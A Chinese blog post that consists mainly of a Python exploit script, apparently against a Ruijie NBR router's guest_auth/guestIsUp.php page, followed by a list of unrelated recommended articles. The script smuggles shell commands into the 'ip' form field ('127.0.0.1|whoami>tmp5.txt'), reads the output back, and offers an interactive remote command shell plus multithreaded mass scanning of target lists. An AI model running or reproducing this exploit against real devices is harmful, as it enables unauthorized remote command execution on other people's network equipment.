POC_R

最新推荐文章于 2024-04-27 22:51:17 发布
最新推荐文章于 2024-04-27 22:51:17 发布
阅读量1k 收藏
点赞数
分类专栏: 笔记 文章标签: r语言 chrome safari
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itgougou_/article/details/121691941
版权 
import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
import base64

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

#随机ua
def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua

#poc
def check_vuln(url):
	url = parse.urlparse(url)
	url1 = url.scheme + '://' + url.netloc
	vuln_url = url.scheme + '://' + url.netloc + '/guest_auth/guestIsUp.php'
	headers = {
		'User-Agent': get_ua(),
		"Content-Type": "application/x-www-form-urlencoded",
	}
	data="mac=1&ip=127.0.0.1|whoami>tmp5.txt"
	try:
		res = requests.post(vuln_url,headers=headers,data=data,timeout=15,verify=False)
		if res.status_code==200:
			res2 = requests.get(url1 + '/guest_auth/tmp5.txt',headers=headers,timeout=15,verify=False)
			if res2.status_code==200 and len(res2.text)<100:
				print("\033[32m[+]%s id:%s\033[0m" %(url1,res2.text),end='')
				return 1
		else:
			print("\033[31m[-]%s is not vuln\033[0m" %url1)

	except Exception as e:
		print("\033[31m[-]%s is timeout\033[0m" %url1)

#cmdshell
def cmdshell(url):
	if check_vuln(url) == 1:
		url = parse.urlparse(url)
		url1 = url.scheme + '://' + url.netloc
		headers = {
		'User-Agent': get_ua(),
		"Content-Type": "application/x-www-form-urlencoded",
		}
		while 1:
			cmd = input("\033[35mCmd: \033[0m")
			if cmd =="exit":
				sys.exit(0)
			else:
				data="mac=1&ip=127.0.0.1|"+ cmd +">tmp5.txt"
				try:
					res = requests.post(url1 + '/guest_auth/guestIsUp.php',headers=headers,data=data,timeout=15,verify=False)
					if res.status_code==200:
						res2 = requests.get(url1 + '/guest_auth/tmp5.txt',headers=headers,timeout=15,verify=False)
						if res2.status_code==200:
							print("\033[32m%s\033[0m" %res2.text,end='')
					else:
						print("\033[31m[-]%s request flase!\033[0m" %url1)

				except Exception as e:
					print("\033[31m[-]%s is timeout!\033[0m" %url1)


#多线程
def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_vuln, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	show = r'''

	______ _____   _   _ ____________  ______  _____  _____ 
	| ___ \  __ \ | \ | || ___ \ ___ \ | ___ \/  __ \|  ___|
	| |_/ / |  \/ |  \| || |_/ / |_/ / | |_/ /| /  \/| |__  
	|    /| | __  | . ` || ___ \    /  |    / | |    |  __| 
	| |\ \| |_\ \ | |\  || |_/ / |\ \  | |\ \ | \__/\| |___ 
	\_| \_|\____/ \_| \_/\____/\_| \_| \_| \_| \____/\____/ 
	          ______               ______                   
	         |______|             |______|                  
	                                                                    
                              		RG_NBR_RCE_exp By m2
	'''
	print(show + '\n')
	arg=ArgumentParser(description='RG_NBR_RCE_exp By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	arg.add_argument("-c",
					"--cmd",
					help="Target URL; Example:http://ip:port")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	cmd=args.cmd
	print('[*]任务开始...')
	if url != None and cmd == None and filename == None:
		check_vuln(url)
	elif url == None and cmd == None and filename != None:
		start=time()
		for i in open(filename):
			i=i.replace('\n','')
			url_list.append(i)
		multithreading(url_list,10)
		end=time()
		print('任务完成,用时%d' %(end-start))
	elif url == None and cmd != None and filename == None:
		cmdshell(cmd)

Three ooo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
POC_ECMS_AUTH
05-08
POC_ECMS_AUTH 调用验证: (来自具有/路径的IDEA) (来自war文件) 有效负载原始值: { " userId " : " dummy " , " password " : " 12345678 " , " uri " : " ...
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1070
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
python编写poc_python爬虫_自动获取seebug的poc实例
weixin_31632707的博客
12-23 473
简单的写了一个爬取www.seebug.org上poc的小玩意儿~首先我们进行一定的抓包分析我们遇到的第一个问题就是seebug需要登录才能进行下载,这个很好处理,只需要抓取返回值200的页面,将我们的headers信息复制下来就行了(这里我就不放上我的headers信息了,不过headers里需要修改和注意的内容会在下文讲清楚)headers = {'Host':******,'Connecti...
python编写poc_学习Python到写poc其实没那么难
weixin_36084130的博客
01-14 604
现在,开始!0x00 前言今天刚刚把放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊?????0x01 不会开发可以”抄”作为一个学渣,要考试的时候,总是把历年考题拿出来,别人题型怎么写的,你就怎么套,不用去管他原理。就好比别人都叫三楼...
python编写poc_干货分享丨Python从入门到编写POC之爬虫专题
weixin_42513054的博客
12-23 833
Python从入门到编写POC系列文章是i春秋论坛作家「Exp1ore」表哥原创的一套完整教程,想系统学习Python技能的小伙伴,不要错过哦!Python从入门到编写POC之爬虫专题说到爬虫,用Python写的貌似是很多的。举个例子,re模块,BeautifulSoup模块,pyspider模块,pyquery等,当然还要用到requests模块,urllib模块,urllib2模块,还有一个四...
php过安全狗
05-26
由于安全狗越来越厉害 但也快刀斩狗狗的代码
R-poc
03-27
R-POC
ProjectR-POC:Project R 的概念验证和原型工作
06-14
项目R-POC Project R 的概念验证和原型工作这个 Github 项目正在为一个社区创建的游戏进行初始概念验证 (POC),该游戏围绕最终幻想的装饰和遗产设计。 概念验证背后的想法是表明一个想法可以实施而无需特别担心技术...
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高...cve_2019_19844_poc ) 运行pip install -r requirements.txt && ./manage.py migrate --noinput 使用shell命令创建以下用户: >> > from dj
RKNN:yolov8模型转换与板端推理流程
AI数据工厂
04-27 792
记录了“yolov8的torch模型转onnx再转rknn,并在瑞芯微RK3588上进行推理验证”的过程。
用R软件寻找最优子集,应用回归分析,逐步回归实例,前进法,后退法
2201_75305489的博客
04-27 567
x1 x2 x3 x4 x5 x6 x7 x8 x9 调整R平方。用R软件寻找最优子集,
【IR 论文】DPR — 最早提出使用嵌入向量来检索文档的模型
VLyb
04-27 650
DPR —— 经典地使用嵌入向量来检索文档的模型
bayesplot|分享一个可视化贝叶斯模型的R包
Senoh的博客
04-24 456
该包主要用于贝叶斯模型的可视化分析,提供了一系列工具来帮助评估、理解和诊断贝叶斯模型。这个包特别适用于与 Stan 以及其他提供 MCMC 样本的软件如 JAGS 和 BUGS 的模型输出。后验分布图:包括密度图、直方图和区间图,用于展示模型参数的后验分布。MCMC 诊断图追踪图(trace plots)、秩序图(rank plots)、自相关图(autocorrelation plots)和转移图(transition plots),这些都是用来诊断 MCMC 算法收敛性的工具。后验预测检查。
R语言高级数据管理
最新发布
袁震的博客
04-27 163
绝对值函数abs(x)sqrt(x) 开平方根不小于某个数的最小整数ceiling(x)不大于某个数的最大整数floor(x)四舍五入round(x)sin(x)cos(x)log(x)
R语言贝叶斯方法在生态环境领域中的应用
zkzhzy的博客
04-27 702
回归及结构方程模型概述及数据探索;R和Rstudio简介及入门和作图基础;R语言数据清洗-tidyverse包;贝叶斯回归与混合效应模型;贝叶斯空间自相关、时间自相关及系统发育相关数据分析;贝叶斯非线性数据分析;贝叶斯结构方程模型及统计结果作图等。
R语言 数据分组汇总:求平均值、标准差、标准误
yangyulu1998的博客
04-27 361
有时,汇总数据框中会出现空的因子组合,即有可能出现的因素组合,但实际上并没有出现在原始数据框架中。由性别和条件的组合来分组:F-安慰剂、F-阿司匹林、M-安慰剂和 M-阿司匹林。4) standard error of the mean (均值标准误差)不同性别受试者,服用阿斯匹林或安慰剂前后的观测值以及变化差值。扩充:安排一步得出均值、计数、标准差、标准误和置信区间的函数。当你想按组对数据进行汇总(包括平均值、标准差等)如果数据中有NA值并希望忽略它们,设置。调用的每个函数,除了。
SpringCloudStream 3.x rabbit 使用
qq_51470789的博客
04-27 618
spring Cloud Stream 3.x rabbitmq
【JavaParser笔记04】如何使用JavaParser依赖库生成Java类、接口、方法、属性、注释等内容
•一个写代码的• •知识星球•https://t.zsxq.com/15rGFbGEk
04-27 22
一、JavaParser代码生成1.1、引入依赖1.2、生成Java类1.3、生成属性和setter、getter方法1.4、生成方法前面几篇文章介绍了如何JavaParser依赖解析Java源代码文件中的内容,JavaParser不仅可以解析Java源代码,而且还可以生成对应的Java代码,例如:生成Java类和接口、生成方法、生成属性、生成注释内容等等。这篇文章就介绍一下,如何使用JavaParser依赖生成Java代码。首先在项目工程中,引入javaparser-core依赖和javaparser
Python生产poc脚本
03-28
对于一个Python开发者来说,写一个POC脚本并不难。下面是一个简单的示例: ```python import requests url = 'http://example.com' payload = {'username': 'admin', 'password': '123456'} r = requests.post...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值